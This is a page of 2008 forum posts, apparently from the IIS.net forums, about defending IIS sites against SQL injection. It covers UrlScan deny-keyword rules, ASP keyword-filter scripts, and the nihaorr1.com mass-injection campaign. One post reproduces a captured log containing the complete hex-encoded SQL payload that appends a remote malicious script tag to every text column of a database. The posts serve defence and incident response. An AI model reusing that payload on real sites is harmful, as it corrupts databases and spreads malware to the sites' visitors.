Search results matching tag 'sql injection'

URLScan 3.0 RTW: [AlwaysAllowedQueryStrings]

jgraham — Tue, 02 Sep 2008 13:46:32 GMT

Doing some testing, currently, and running into some issues with this.

We've got a couple cases where things like 'cast' or 'open' are appropriate for our webpages.

I've setup an AlwaysAllowedQueryStrings section:

[AlwaysAllowedQueryStrings]
branch=Openshaw
branch=Newcastle+upon+Tyne

Now, this is great... and it works fine, if I look up /town.asp?branch=Openshaw

However, some of our pages will send branch=Openshaw&x=22&y=9 and URLScan appears to be treating "&x=22&y=9" as part of branch=

Is there any way around this? The product could really save us while we hound vendors to update their code to account for SQL injection/etc. But with these cases, it would do about as much harm as good, at this stage.

Thanks in advance.

Re: UrlScan 3.0 Beta not capturing SQL Injection

apajlopez — Mon, 18 Aug 2008 12:51:54 GMT

Rovastar,

I can confirm that the workaround that KentZhou posted works. I have included below the contents of the RuleList section in the UrlScan.ini as I have it in my test box.

After changing the rule though I issued an iisreset /restart command before I tested so the UrlScan.ini's settings were taken into account. I don't know if there is a cycle by which these settings in the .ini file are refreshed.

I tried issuing the following request, all of which were stopped by URLScan:

http://localhost/?declare
http://localhost/default.asp?declare
http://localhost/default.aspx?declare

RuleList=SQLInjection

[SQLInjection]
AppliesTo=.asp,.aspx,.
DenyDataSection=SQL Injection Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=

[SQL Injection Strings]
--
%3b ; a semicolon
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
create
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
insert
kill
open
select
sys ; also catches sysobjects and syscolumns
table
update

Re: Anyone know about www.nihaorr1.com/1.js?

ejhay — Thu, 22 May 2008 02:11:46 GMT

Hi, Im a System Administrator of a Hosting Company, and one of our website has been hacked with SQL injection, At first the hacker inserted nihaorr1.com/1.js most of the website table are being affected with this attacked, after that incident I developed a SQL validation that is similar on the asp script that you posted in this forum unfortunately the hacker inserted again a malicious URL on the MS SQL database what I did is I include the validation for all database driven pages to make the website secured but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. please advise what else can I do with this problem. thanks

Re: Anyone know about www.nihaorr1.com/1.js?

ejhay — Thu, 22 May 2008 02:08:52 GMT

Hi, Im a System Administrator of a Hosting Company and one of our website has been hack with SQL injection, At first the hacker inserted nihaorr1.com/1.js most of the website table are being affected with this attacked, after I created that a created a SQL validation like one that you have posted in this forum unfortunately the hacker inserted again a malicious URL on the MS SQL database what I did is I include the validation for all database driven pages to make the website secured but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. please advise what else can I do with this problem. thanks

Re: Anyone know about www.nihaorr1.com/1.js?

alexhiggins732 — Sun, 27 Apr 2008 02:53:56 GMT

Hi,

The use of this script at pointing to nihaorr1.com is only the latest method of attack used by this attacker. This guy has been hacking at a clients web site for a long time and usually does so through various proxy servers. For those looking for a tool to view IIS log files, check out this program I have written http://www.alexanderhiggins.com/logfileparser.aspx

To prevent the attacks I have made done the following:

1) Open notepad and past the following code. The code will check the request for a sql injection attack, and if it finds one it sends you an email and redirects the request to an error page.

<%
dim str
dim r
dim badwords
str = request.servervariables("QUERY_STRING")

if verify(str) = false or (request.querystring("preview")="true") then
Set myMail=CreateObject("CDO.Message")
myMail.Subject="Sending email with CDO"
myMail.From="youremailaddress@yourdomain.com"
myMail.To="mailto:youremailaddress@yourdomain.com"

Dim body
for each item in request.servervariables
  body = body & item & "=" & request.servervariables(item) & vbcrlf
next
'for each item in request.params
  'body = body & item & "=" & request.params(item) & vbcrlf
'next
myMail.TextBody="This is a SQL Injection Hack Attempt. Heres the details. " & vbcrlf & vbcrlf & body
if request.querystring("preview")="true" then
  response.write("<pre>" & myMail.textbody & "</pre>")
  set myMail=nothing
else
  myMail.Send
  set myMail=nothing
  response.redirect("urlscripterror.asp")
end if

end if
  'response.write(verify(str) &"<BR>")
  'response.write(str &"<BR>")
  'response.write(request.servervariables.count)
  'for each item in request.servervariables
  'response.write(item & "=" & request.servervariables(item) & "<BR>")
  'next

function verify(s)

'convert the querystring to lowercase
s = lcase(s)

' badwords - a list of disallowed keywords in the url
badwords= "select insert update delete drop -- table alter cast convert exec chr( union"

' create an array list of each back word
r = split(badwords, " ")

' loop through the bad words and return false if it is present.
for i =0 to ubound(r)
  if instr(s, r(i)) > 0 then

       verify = false 'instr(s, r(i))
   exit function
  end if
next

' If the badword was not found then set verified to = True
verify=true

end function
%>

2) Save the file as urlfilter.asp and upload it to your web site root.

3) Include the file by pasting the following codeat the very beginning of your asp pages. Note if your site uses includes you can include it in a single include that is shared by all of your pages.

From a security perspective, lock down your databases. Perhaps allow only select permissions for anonymous viewers and have a different sql login and connection string for the backend where database updates are required.

My issue with monitoring for EXEC commands is by that point the damage is already done. Further, if the hacker is skilled enough they can comprimise your entire server before you even realize they have attacked using the write sql code.

Here is the email I received when this attack happened, with certain information replaced of course.

This is a SQL Injection Hack Attempt. Heres the details.

ALL_HTTP=HTTP_CONNECTION:keep-alive

HTTP_CONTENT_LENGTH:0

HTTP_CONTENT_TYPE:text/html

HTTP_ACCEPT:text/html, */*

HTTP_HOST:www.domainname.com

HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)

ALL_RAW=Connection: keep-alive

Content-Length: 0

Content-Type: text/html

Accept: text/html, */*

Host: www.domainname.com

User-Agent: Mozilla/3.0 (compatible; Indy Library)

APPL_MD_PATH=/LM/W3SVC/1206399212/Root

APPL_PHYSICAL_PATH=E:\domainname\web\

AUTH_PASSWORD=

AUTH_TYPE=

AUTH_USER=

CERT_COOKIE=

CERT_FLAGS=

CERT_ISSUER=

CERT_KEYSIZE=

CERT_SECRETKEYSIZE=

CERT_SERIALNUMBER=

CERT_SERVER_ISSUER=

CERT_SERVER_SUBJECT=

CERT_SUBJECT=

CONTENT_LENGTH=0

CONTENT_TYPE=text/html

GATEWAY_INTERFACE=CGI/1.1

HTTPS=off

HTTPS_KEYSIZE=

HTTPS_SECRETKEYSIZE=

HTTPS_SERVER_ISSUER=

HTTPS_SERVER_SUBJECT=

INSTANCE_ID=1206399212

INSTANCE_META_PATH=/LM/W3SVC/1206399212

LOCAL_ADDR=xxx.xxx.xxx.xxx

LOGON_USER=

PATH_INFO=/attackedpage.asp

PATH_TRANSLATED=E:\domainname\web\attackedpage.asp

QUERY_STRING=date=4/17/2008%2011:05:00%20AM';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

REMOTE_ADDR=219.153.46.28

REMOTE_HOST=219.153.46.28

REMOTE_USER=

REQUEST_METHOD=POST

SCRIPT_NAME=/lakewood_blueclaws_schedule.asp

SERVER_NAME=www.domainname.com

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1.0

SERVER_SOFTWARE=Microsoft-IIS/6.0

URL=/attackedpage.asp

HTTP_CONNECTION=keep-alive

HTTP_CONTENT_LENGTH=0

HTTP_CONTENT_TYPE=text/html

HTTP_ACCEPT=text/html, */*

HTTP_HOST=www.domainname.com

HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library)

As you can see the attacker simple sent a malformed URL query, which of course is viewable in my IIS logs.

SQL Injection Attacks on IIS Web Servers

bills — Sat, 26 Apr 2008 03:41:33 GMT

This thread will contain the latest information regarding recent reports that have surfaced stating that web sites running on Microsoft’s Internet Information Services (IIS) 6.0 have been compromised. These reports allude to a possible vulnerability in IIS or issues related to Security Advisory 951306 which was released last week.

Microsoft has investigated these reports and determined that the attacks are not related to the recent Microsoft Security Advisory (951306) or any known security issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies.

Instead, attackers have crafted an automated attack that can take advantage of SQL injection vulnerabilities in web pages that do not follow security best practices for web application development. While these particular attacks are targeting sites hosted on IIS web servers, SQL injection vulnerabilities may exist on sites hosted on any platform. More information on SQL injection attacks can be found here and here.

Guidance from Microsoft for web application development best practices can also be found on this MSDN page. Best practices guidelines that developers may follow to mitigate SQL injection, can be located here. As we continue to make progress in our investigation on this attack, we will provide updated guidance and information on the IIS.net site. For the latest information on this issue, please subscribe or visit the IIS security forum.

For end-users, the investigation also shows no indication of an un-patched vulnerability in IIS, SQL Server, Internet Explorer or any other Microsoft client software, so we recommend customers apply the latest updates to be protected from these attacks.

To further protect themselves from reported attacks, we encourage all customers to apply our most recent security updates to help ensure that their computers are protected from attempted criminal attacks. For more information about security updates, visit: www.microsoft.com/protect.

Anyone believed to have been affected can visit: http://www.microsoft.com/protect/support/default.mspx and should contact the national law enforcement agency in their country. Those in the United States can contact Customer Service and Support at no charge using the PC Safety hotline at 1-866-PCSAFETY. Additionally, customers in the United States should contact their local FBI office or report their situation at: www.ic3.gov

Subscribe to this thread, or check back later for the latest information from the community.

Re: Anyone know about www.nihaorr1.com/1.js?

nhertz — Thu, 24 Apr 2008 21:11:03 GMT

I would advise anyone affected by this attack to activate the SQL profiler (or equivalent) and set it to record only EXEC commands. If your website then becomes infected again you can quickly scroll through the profiler output and find the "suspicious" command where the injection has entered. This should also give you a hint of the exact page that had the vulnerability.

I cleaned up a site this week where the profiler had recorded:

SELECT TOP 100 People.Countries, States.Titles, Houses.Types FROM People, States, Houses Where People.Titles LIKE '%agent;DECLARE @S NVARCHAR(4000);SET etc......

So I could quickly locate the page which had the SELECT TOP 100 statement.
That is where I added the quick fix:

<%
some code here....
%>

<%
rs.Open sql
%>

With the validator file containing:

<%
if instr(lcase(sql),";--")>0 then
response.redirect("index.asp")
end if

if instr(lcase(sql),"nvarchar")>0 then
response.redirect("index.asp")
end if
%>

Cheers and good luck,

Nicolai Hertz
software programmer